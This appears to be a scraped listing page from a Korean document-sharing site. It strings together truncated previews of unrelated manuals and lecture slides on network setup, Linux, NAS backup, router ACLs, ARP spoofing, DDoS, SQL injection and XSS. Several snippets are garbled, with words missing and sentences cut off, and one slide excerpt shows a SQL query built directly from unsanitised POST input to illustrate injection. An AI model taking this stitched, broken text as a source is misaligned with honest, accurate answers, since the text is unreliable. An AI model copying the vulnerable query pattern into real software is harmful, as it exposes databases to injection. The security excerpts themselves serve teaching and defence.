Remote UI Guide Remote UI KOR Remote UI Remote UI PDF Adobe Reader/Adobe Acrobat Reader. Adobe Reader/Adobe Acrobat Reader Adobe Systems Incorporated.. Canon. Remote UI GIF Adobe Systems Incorporated Photoshop. ..........................................................

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Deep Learning 작업환경조성 & 사용법 ISL 안재원 Ubuntu 설치 작업환경조성 접속방법 사용예시 2 - ISO file Download www.ubuntu.com Ubuntu 설치 3 - Make Booting USB Ubuntu 설치 http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/

More information

. PC PC 3 [ ] [ ], [ ] [ ] [ ] 3 [ ] [ ], 4 [ ] [ ], 4 [Internet Protocol Version 4 (TCP/IPv4)] 5 [ ] 6 [ IP (O)], [ DNS (B)] 7 [ ] 한국어 -

. PC PC 3 [ ] [ ], [ ] [ ] [ ] 3 [ ] [ ], 4 [ ] [ ], 4 [Internet Protocol Version 4 (TCP/IPv4)] 5 [ ] 6 [ IP (O)], [ DNS (B)] 7 [ ] 한국어 - Quick Network Setup Guide xdsl/cable Modem PC DVR ~3.., PC, DVR. Cable IP Cable/ADSL/ VDSL or 3 4 VIDEO OUT (SPOT) AUDIO IN VGA ALARM OUT COM ALARM IN RS-485 3 4 G G + 3 CONSOLE NETWORK DC V VIDEO IN VIDEO

More information

아래 항목은 최신( ) 이미지를 모두 제대로 설치하였을 때를 가정한다

아래 항목은 최신( ) 이미지를 모두 제대로 설치하였을 때를 가정한다 공유기사용환경에서 MNC-V100 환경설정하기 다음설명은 AnyGate GW-400A (Http://www.anygate.co.kr) 를사용하는네트워크환경에서 MNC-V100 을연결하여사용하는법을설명합니다. 공유기내부네트워크환경설정공유기를사용하는환경에서공유기의설정을아래그림과같이설정하시면 MNC-V100의설정을변경하지않아도모비캠과연결할수있습니다. ( 공유기의환경을변경하기어려운경우에는

More information

Microsoft PowerPoint - ch13.ppt

Microsoft PowerPoint - ch13.ppt chapter 13. 네트워크보안과 ACL 한빛미디어 -1- 학습목표 계층별네트워크보안이슈 시스코라우터의 ACL 시스코라우터의 ACL 설정 한빛미디어 -2- 계층별네트워크보안이슈 데이터링크계층보안 ARP 스푸핑 MAC 플러딩 한빛미디어 -3- 계층별네트워크보안이슈 방화벽 [ 그림 ] 방화벽구조 한빛미디어 -4- 계층별네트워크보안이슈 침입탐지시스템 (IDS)

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 (Host) set up : Linux Backend RS-232, Ethernet, parallel(jtag) Host terminal Target terminal : monitor (Minicom) JTAG Cross compiler Boot loader Pentium Redhat 9.0 Serial port Serial cross cable Ethernet

More information

제20회_해킹방지워크샵_(이재석)

제20회_해킹방지워크샵_(이재석) IoT DDoS DNS (jaeseog@sherpain.net) (www.sherpain.net) DDoS DNS DDoS / DDoS(Distributed DoS)? B Asia Broadband B Bots connect to a C&C to create an overlay network (botnet) C&C Provider JP Corp. Bye Bye!

More information

NTD36HD Manual

NTD36HD Manual Upnp 사용 D7 은 UPNP 를지원하여 D7 의네크워크에연결된 UPNP 기기에별다른설정없이연결하여, 유무선으로네트워크상의연결된 UPNP 기기의콘텐츠를재생할수있습니다. TV 화면의 브라우저, UPNP 를선택하면연결가능한 UPNP 기기가표시됩니다. 주의 - UPNP 기능사용시연결된 UPNP 기기의성능에따라서재생되지않는콘텐츠가있을수있습니다. NFS 사용 D7

More information

Microsoft PowerPoint - comp_prac_081223_2.pptx

Microsoft PowerPoint - comp_prac_081223_2.pptx Computer Programming Practice (2008 Winter) Practice 2 기본 Unix/Linux 명령어숙지 2008. 12. 23 Contents Linux commands Basic commands File and Directory User Data Filtering Process Etc Conclusion & Recommended

More information

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O Orange for ORACLE V4.0 Installation Guide ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE...1 1....2 1.1...2 1.2...2 1.2.1...2 1.2.2 (Online Upgrade)...11 1.3 ORANGE CONFIGURATION ADMIN...12 1.3.1 Orange Configuration

More information

소개 TeraStation 을 구입해 주셔서 감사합니다! 이 사용 설명서는 TeraStation 구성 정보를 제공합니다. 제품은 계속 업데이트되므로, 이 설명서의 이미지 및 텍스트는 사용자가 보유 중인 TeraStation 에 표시 된 이미지 및 텍스트와 약간 다를 수

소개 TeraStation 을 구입해 주셔서 감사합니다! 이 사용 설명서는 TeraStation 구성 정보를 제공합니다. 제품은 계속 업데이트되므로, 이 설명서의 이미지 및 텍스트는 사용자가 보유 중인 TeraStation 에 표시 된 이미지 및 텍스트와 약간 다를 수 사용 설명서 TeraStation Pro II TS-HTGL/R5 패키지 내용물: 본체 (TeraStation) 이더넷 케이블 전원 케이블 TeraNavigator 설치 CD 사용 설명서 (이 설명서) 제품 보증서 www.buffalotech.com 소개 TeraStation 을 구입해 주셔서 감사합니다! 이 사용 설명서는 TeraStation 구성 정보를

More information

C# Programming Guide - Types

C# Programming Guide - Types C# Programming Guide - Types 최도경 lifeisforu@wemade.com 이문서는 MSDN 의 Types 를요약하고보충한것입니다. http://msdn.microsoft.com/enus/library/ms173104(v=vs.100).aspx Types, Variables, and Values C# 은 type 에민감한언어이다. 모든

More information

게시판 스팸 실시간 차단 시스템

게시판 스팸 실시간 차단 시스템 오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP

More information

bn2019_2

bn2019_2 arp -a Packet Logging/Editing Decode Buffer Capture Driver Logging: permanent storage of packets for offline analysis Decode: packets must be decoded to human readable form. Buffer: packets must temporarily

More information

Sena Device Server Serial/IP TM Version

Sena Device Server Serial/IP TM Version Sena Device Server Serial/IP TM Version 1.0.0 2005. 3. 7. Release Note Revision Date Name Description V1.0.0 2005-03-7 HJ Jeon Serial/IP 4.3.2 ( ) 210 137-130, : (02) 573-5422 : (02) 573-7710 email: support@sena.com

More information

Microsoft PowerPoint - 2.Catalyst Switch Intrastructure Protection_이충용_V1 0.ppt [호환 모드]

Microsoft PowerPoint - 2.Catalyst Switch Intrastructure Protection_이충용_V1 0.ppt [호환 모드] Catalyst Switch Infrastructure Protection Cisco Systems Korea SE 이충용 (choolee@cisco.com) Overview DoS (Denial of Service) 공격대상 - Server Resource - Network Resource - Network devices (Routers, Firewalls

More information

<41736D6C6F D20B9AEBCADBEE7BDC42E687770>

<41736D6C6F D20B9AEBCADBEE7BDC42E687770> IDA Remote Debugging 2007. 01. 이강석 / certlab@gmail.com http://www.asmlove.co.kr - 1 - Intro IDA Remote debugging에대해알아봅시다. 이런기능이있다는것을잘모르시는분들을위해문서를만들었습니다. IDA 기능중에분석할파일을원격에서디버깅할수있는기능이있는데먼저그림과함께예를들어설명해보도록하겠습니다.

More information

목차 데모 홖경 및 개요... 3 테스트 서버 설정... 4 DC (Domain Controller) 서버 설정... 4 RDSH (Remote Desktop Session Host) 서버 설정... 9 W7CLIENT (Windows 7 Client) 클라이얶트 설정

목차 데모 홖경 및 개요... 3 테스트 서버 설정... 4 DC (Domain Controller) 서버 설정... 4 RDSH (Remote Desktop Session Host) 서버 설정... 9 W7CLIENT (Windows 7 Client) 클라이얶트 설정 W2K8 R2 RemoteApp 및 Web Access 설치 및 구성 Step-By-Step 가이드 Microsoft Korea 이 동 철 부장 2009. 10 페이지 1 / 60 목차 데모 홖경 및 개요... 3 테스트 서버 설정... 4 DC (Domain Controller) 서버 설정... 4 RDSH (Remote Desktop Session Host)

More information

목차 백업 계정 서비스 이용 안내...3 * 권장 백업 정책...3 * 넷하드(100G 백업) 계정 서버로 백업하는 2가지 방법...3 * 백업서버 이용시 주의사항...3 WINDOWS 서버 사용자를 위한 백업서비스 이용 방법 네트워크 드라이브에 접속하여

목차 백업 계정 서비스 이용 안내...3 * 권장 백업 정책...3 * 넷하드(100G 백업) 계정 서버로 백업하는 2가지 방법...3 * 백업서버 이용시 주의사항...3 WINDOWS 서버 사용자를 위한 백업서비스 이용 방법 네트워크 드라이브에 접속하여 100G 백업계정 서비스 이용안내 (주)스마일서브 가상화사업본부 클라우드 서비스팀 UPDATE 2011. 10. 20. 목차 백업 계정 서비스 이용 안내...3 * 권장 백업 정책...3 * 넷하드(100G 백업) 계정 서버로 백업하는 2가지 방법...3 * 백업서버 이용시 주의사항...3 WINDOWS 서버 사용자를 위한 백업서비스 이용 방법...4 1.

More information

6강.hwp

6강.hwp ----------------6강 정보통신과 인터넷(1)------------- **주요 키워드 ** (1) 인터넷 서비스 (2) 도메인네임, IP 주소 (3) 인터넷 익스플로러 (4) 정보검색 (5) 인터넷 용어 (1) 인터넷 서비스******************************* [08/4][08/2] 1. 다음 중 인터넷 서비스에 대한 설명으로

More information

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770> 개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000

More information

Apache( 단일도메인 ) SSL 인증서갱신설치가이드 본문서는주식회사한국기업보안에서 SSL 보안서버인증서설치를위해작성된문서로 주식회사한국기업보안의동의없이무단으로사용하실수없습니다. [ 고객센터 ] 한국기업보안. 유서트기술팀 Copyright 201

Apache( 단일도메인 ) SSL 인증서갱신설치가이드 본문서는주식회사한국기업보안에서 SSL 보안서버인증서설치를위해작성된문서로 주식회사한국기업보안의동의없이무단으로사용하실수없습니다. [ 고객센터 ] 한국기업보안. 유서트기술팀 Copyright 201 Apache( 단일도메인 ) SSL 인증서갱신설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 02-512-9375 1. 발급받으신인증서를해당서버폴더에업로드또는저장합니다. 설명 : [$httpd_home] = Apache 디렉토리 [root@localhost httpd]# mkdir conf.d/ssl_new [root@localhost httpd]#

More information

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자 SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전

More information

목차 BUG offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate

목차 BUG offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate ALTIBASE HDB 6.1.1.5.6 Patch Notes 목차 BUG-39240 offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG-41443 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate 한뒤, hash partition

More information

본교재는수업용으로제작된게시물입니다. 영리목적으로사용할경우저작권법제 30 조항에의거법적처벌을받을수있습니다. [ 실습 ] 스위치장비초기화 1. NVRAM 에저장되어있는 'startup-config' 파일이있다면, 삭제를실시한다. SWx>enable SWx#erase sta

본교재는수업용으로제작된게시물입니다. 영리목적으로사용할경우저작권법제 30 조항에의거법적처벌을받을수있습니다. [ 실습 ] 스위치장비초기화 1. NVRAM 에저장되어있는 'startup-config' 파일이있다면, 삭제를실시한다. SWx>enable SWx#erase sta [ 실습 ] 스위치장비초기화 1. NVRAM 에저장되어있는 'startup-config' 파일이있다면, 삭제를실시한다. SWx>enable SWx#erase startup-config Erasing the nvram filesystem will remove all configuration files Continue? [confirm] ( 엔터 ) [OK] Erase

More information

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아 LG U+ SMS/MMS 통합클라이언트 LG U+ SMS/MMS Client Simple Install Manual LG U+ SMS/MMS 통합클라이언트 - 1 - 간단설치매뉴얼 1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml

More information

호스팅사업자보안안내서 ( 해킹경유지악용방지 ) 침해사고분석단사고분석팀

호스팅사업자보안안내서 ( 해킹경유지악용방지 ) 침해사고분석단사고분석팀 호스팅사업자보안안내서 ( 해킹경유지악용방지 ) 침해사고분석단사고분석팀 2015. 3. 제 1 장개요 1 1. ( 사고사례 1) ARP 스푸핑 2 2. ( 사고사례 2) 공유폴더악용 3 제 2 장 ARP 스푸핑 6 1. ARP 스푸핑공격개요 7 2. ARP 스푸핑공격발생증상 7 3. ARP 스푸핑공격확인방법 8 4. ARP 스푸핑공격대응방안 ( 서버 ) 9 5.

More information

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó Korea Internet & Security Agency 21 3 CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 31 34 35 1 213 Bot 1,85 1,32 16.7 1,53 1,76 12.1 222 317 3. 116 16 9.4% 345 23 5.% 267 233 14.6%

More information

Subnet Address Internet Network G Network Network class B networ

Subnet Address Internet Network G Network Network class B networ Structure of TCP/IP Internet Internet gateway (router) Internet Address Class A Class B Class C 0 8 31 0 netid hostid 0 16 31 1 0 netid hostid 0 24 31 1 1 0 netid hostid Network Address : (A) 1 ~ 127,

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 사용자계정관리 운영체제실습 목차 Ⅲ. 사용자계정관리 4.1 사용자계정관리 4.2 그룹관리 4.3 사용자계정관련파일 4.4 패스워드관리 4.5 사용자신분확인 4.1 사용자계정관리 사용자생성관련명령어 사용자생성 : useradd / adduser 사용자삭제 : userdel 사용자정보변경 : usermod 패스워드설정및변경 : passwd 그룹생성관련명령어 group

More information

/chroot/lib/ /chroot/etc/

/chroot/lib/ /chroot/etc/ 구축 환경 VirtualBox - Fedora 15 (kernel : 2.6.40.4-5.fc15.i686.PAE) 작동 원리 chroot유저 ssh 접속 -> 접속유저의 홈디렉토리 밑.ssh의 rc 파일 실행 -> daemonstart실행 -> daemon 작동 -> 접속 유저만의 Jail 디렉토리 생성 -> 접속 유저의.bashrc 의 chroot 명령어

More information

이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론

이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론 이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론 2. 관련연구 2.1 MQTT 프로토콜 Fig. 1. Topic-based Publish/Subscribe Communication Model. Table 1. Delivery and Guarantee by MQTT QoS Level 2.1 MQTT-SN 프로토콜 Fig. 2. MQTT-SN

More information

단계

단계 본문서에서는 Tibero RDBMS 에서제공하는 Oracle DB Link 를위한 gateway 설치및설정방법과 Oracle DB Link 사용법을소개한다. Contents 1. TIBERO TO ORACLE DB LINK 개요... 3 1.1. GATEWAY 란... 3 1.2. ORACLE GATEWAY... 3 1.3. GATEWAY 디렉터리구조...

More information

6주차.key

6주차.key 6, Process concept A program in execution Program code PCB (process control block) Program counter, registers, etc. Stack Heap Data section => global variable Process in memory Process state New Running

More information

메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for

메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for 메일서버등록제(SPF) 인증기능적용안내서 (Exchange 2003 - Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for Exchange 2016 년 6 월 - 1 - 목 차 I. 개요 1 1. SPF( 메일서버등록제)

More information

5th-KOR-SANGFOR NGAF(CC)

5th-KOR-SANGFOR NGAF(CC) NGAF Firewall Platform 새로운 세상, 새로운 IT, 새로운 보안 SANGFOR 보안 개념 SAN GFO NGF W+ R NG AF WAF WAF 2010년대 IT산업이 급속하게 발전함에 따라 모든 애플리케이션과 서비스, 그리고 기기들은 BYOD, 사물인터넷(IoT), 클라우드 등과 같은 새로운 기술로 인터넷을 통해 연결되고 있습니다. 이는

More information

SAS9.2_SAS_Enterprise_Miner_install_guide_single_user_v2

SAS9.2_SAS_Enterprise_Miner_install_guide_single_user_v2 [Win] SAS Enterprise Miner6.1 설치가이드 - Single User 작성자 : 기술지원팀 (SAS Korea) 단계 1) 설치전주의 / 확인사항 2) 사용자생성및권한할당 3) SAS Software Deport 생성 4) SAS Enterprise Miner 설치 (SAS Foundation + Enterprise Miner 6.1) 5)

More information

Windows Server 2012

Windows Server  2012 Windows Server 2012 Shared Nothing Live Migration Shared Nothing Live Migration 은 SMB Live Migration 방식과다른점은 VM 데이터파일의위치입니다. Shared Nothing Live Migration 방식은 Hyper-V 호스트의로컬디스크에 VM 데이터파일이위치합니다. 반면에, SMB

More information

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우. 소프트웨어매뉴얼 윈도우드라이버 Rev. 3.03 SLP-TX220 / TX223 SLP-TX420 / TX423 SLP-TX400 / TX403 SLP-DX220 / DX223 SLP-DX420 / DX423 SLP-DL410 / DL413 SLP-T400 / T403 SLP-T400R / T403R SLP-D220 / D223 SLP-D420 / D423

More information

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 (https://www.kisarbl.or.kr) < 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 Ⅰ. 개요 실시간스팸차단리스트 (RBL) 는메일서버를운영하는누구나손쉽게효과적으로스팸수신을차단하는데이용할수있도록한국인터넷진흥원 (KISA)

More information

1217 WebTrafMon II

1217 WebTrafMon II (1/28) (2/28) (10 Mbps ) Video, Audio. (3/28) 10 ~ 15 ( : telnet, ftp ),, (4/28) UDP/TCP (5/28) centralized environment packet header information analysis network traffic data, capture presentation network

More information

System Recovery 사용자 매뉴얼

System Recovery 사용자 매뉴얼 Samsung OS Recovery Solution 을이용하여간편하게 MagicInfo 의네트워크를설정하고시스템을백업및복원할수있습니다. 시스템시작시리모컨의 - 버튼이나키보드의 F3 키를연속해서누르면복구모드로진입한후 Samsung OS Recovery Solution 이실행됩니다. Samsung OS Recovery Solution 은키보드와리모컨을사용하여조작할수있습니다.

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 B Type 가이드 가지고있는도메인사용 + 인증서구매대행절차 1. 신청하기. 네임서버변경 / 확인 - 네임서버변경 - 네임서버변경확인 3. 인증심사메일에회신하기 - 메일주소확인 - 메일주소변경 - 인증심사메일서명 4. Ver. 015.10.14 가지고있는도메인사용 + 인증서구매대행절차 도메인은가지고있으나인증서가없는경우소유한도메인주소로 를오픈하고인증서는 Qoo10

More information

기존에 Windchill Program 이 설치된 Home Directory 를 선택해준다. 프로그램설치후설치내역을확인해보면 Adobe Acrobat 6.0 Support 내역을확인할수 있다.

기존에 Windchill Program 이 설치된 Home Directory 를 선택해준다. 프로그램설치후설치내역을확인해보면 Adobe Acrobat 6.0 Support 내역을확인할수 있다. PDMLink 에등록된 Office 문서들의 PDF 문서변환기능및 Viewer 기능을알아보자 PDM Link에서지원하는 [Product View Document Support] 기능은 Windows-Base 기반의 Microsoft Office 문서들을 PDMLink용 Viewer인 Product View를통한읽기가가능한 PDF Format 으로변환하는기능이다.

More information

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월 메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. qmail, SPF 인증모듈설치

More information

PowerPoint Template

PowerPoint Template 설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet

More information

Assign an IP Address and Access the Video Stream - Installation Guide

Assign an IP Address and Access the Video Stream - Installation Guide 설치 안내서 IP 주소 할당 및 비디오 스트림에 액세스 책임 본 문서는 최대한 주의를 기울여 작성되었습니다. 잘못되거나 누락된 정보가 있는 경우 엑시스 지사로 알려 주시기 바랍니다. Axis Communications AB는 기술적 또는 인쇄상의 오류에 대해 책 임을 지지 않으며 사전 통지 없이 제품 및 설명서를 변경할 수 있습니다. Axis Communications

More information

Microsoft PowerPoint - 4.스캐닝-1(11.08) [호환 모드]

Microsoft PowerPoint - 4.스캐닝-1(11.08) [호환 모드] 정보보호 Scanning (1) 목차 Ⅳ. 스캐닝 (Scanning) 1. 활성화된호스트식별 ping 침투테스트범위에있는 IP 주소만목록화 현재동작중인시스템확인 Ping - ICMP(Internet Control messaging Protocol) 패킷을사용 - echo request, echo reply 패킷 - target 시스템이 off상태이거나, ICMP패킷을차단하는경우

More information

메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail spf-filter 년 6 월

메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail spf-filter 년 6 월 메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail 8.13.4 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. sendmail, SPF

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Install the PDI on CentOS 2013.04 G L O B E P O I N T 1 Ⅰ linux 구성 II Pentaho Install 2013, Globepoint Inc. All Rights Reserved. 2 I. Linux 구성 2013, Globepoint Inc. All Rights Reserved. 3 IP 설정 1. 설정파일

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port

More information

Analyst Briefing

Analyst Briefing . Improve your Outlook on Email and File Management iseminar.. 1544(or 6677)-3355 800x600. iseminar Chat... Improve your Outlook on Email and File Management :, 2003 1 29.. Collaboration Suite - Key Messages

More information

ㅇ악성코드 분석

ㅇ악성코드 분석 기술문서 2016-10-25 프로젝트 최종보고서 작성자 : 프로젝트 KITRI 제 13 기모의해킹과정 김남용 2 개정이력 개정번호개정내용요약개정일자 1.0 최초제정승인 2016-10-25 1.1 단어수정 2016-10-25 문서규칙 quiz 프로젝트최종보고서 첨부파일버젂문서최종수정일 1 2 3 4 작성및확인은 Microsoft Word 2007으로작성되어졌으며,

More information

Interstage5 SOAP서비스 설정 가이드

Interstage5 SOAP서비스 설정 가이드 Interstage 5 Application Server ( Solaris ) SOAP Service Internet Sample Test SOAP Server Application SOAP Client Application CORBA/SOAP Server Gateway CORBA/SOAP Gateway Client INTERSTAGE SOAP Service

More information

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

개인정보보호의  이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호- 개인정보보호의 이해와 안전한 관리 - 안전한 개인정보 관리- 2013. 6. 26 최 윤 형 (한국정보화진흥원) 1 안전한 개인PC 관리방법 목 차 2 안전한 스마트폰 관리방법 1. 안전한 개인PC 관리방법 정보통신 기기의 보안 위협요인 위협요소 웜, 바이러스, 악성코드, DDos공격침입, 네트워크 공격 휴대성, 이동성 오픈 플랫폼 3G, WiFi, Wibro

More information

MySQL-Ch10

MySQL-Ch10 10 Chapter.,,.,, MySQL. MySQL mysqld MySQL.,. MySQL. MySQL....,.,..,,.,. UNIX, MySQL. mysqladm mysqlgrp. MySQL 608 MySQL(2/e) Chapter 10 MySQL. 10.1 (,, ). UNIX MySQL, /usr/local/mysql/var, /usr/local/mysql/data,

More information

Microsoft Word - Armjtag_문서1.doc

Microsoft Word - Armjtag_문서1.doc ARM JTAG (wiggler 호환 ) 사용방법 ( IAR EWARM 에서 ARM-JTAG 로 Debugging 하기 ) Test Board : AT91SAM7S256 IAR EWARM : Kickstart for ARM ARM-JTAG : ver 1.0 ( 씨링크테크 ) 1. IAR EWARM (Kickstart for ARM) 설치 2. Macraigor

More information

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코 월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.

More information

Microsoft PowerPoint - 권장 사양

Microsoft PowerPoint - 권장 사양 Autodesk 제품컴퓨터사양 PRONETSOFT.CO 박경현 1 AutoCAD 시스템사양 시스템요구사양 32 비트 AutoCAD 2009 를위한시스템요구사항 Intel Pentium 4 프로세서 2.2GHz 이상, 또는 Intel 또는 AMD 듀얼 코어프로세서 16GH 1.6GHz 이상 Microsoft Windows Vista, Windows XP Home

More information

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여

More information

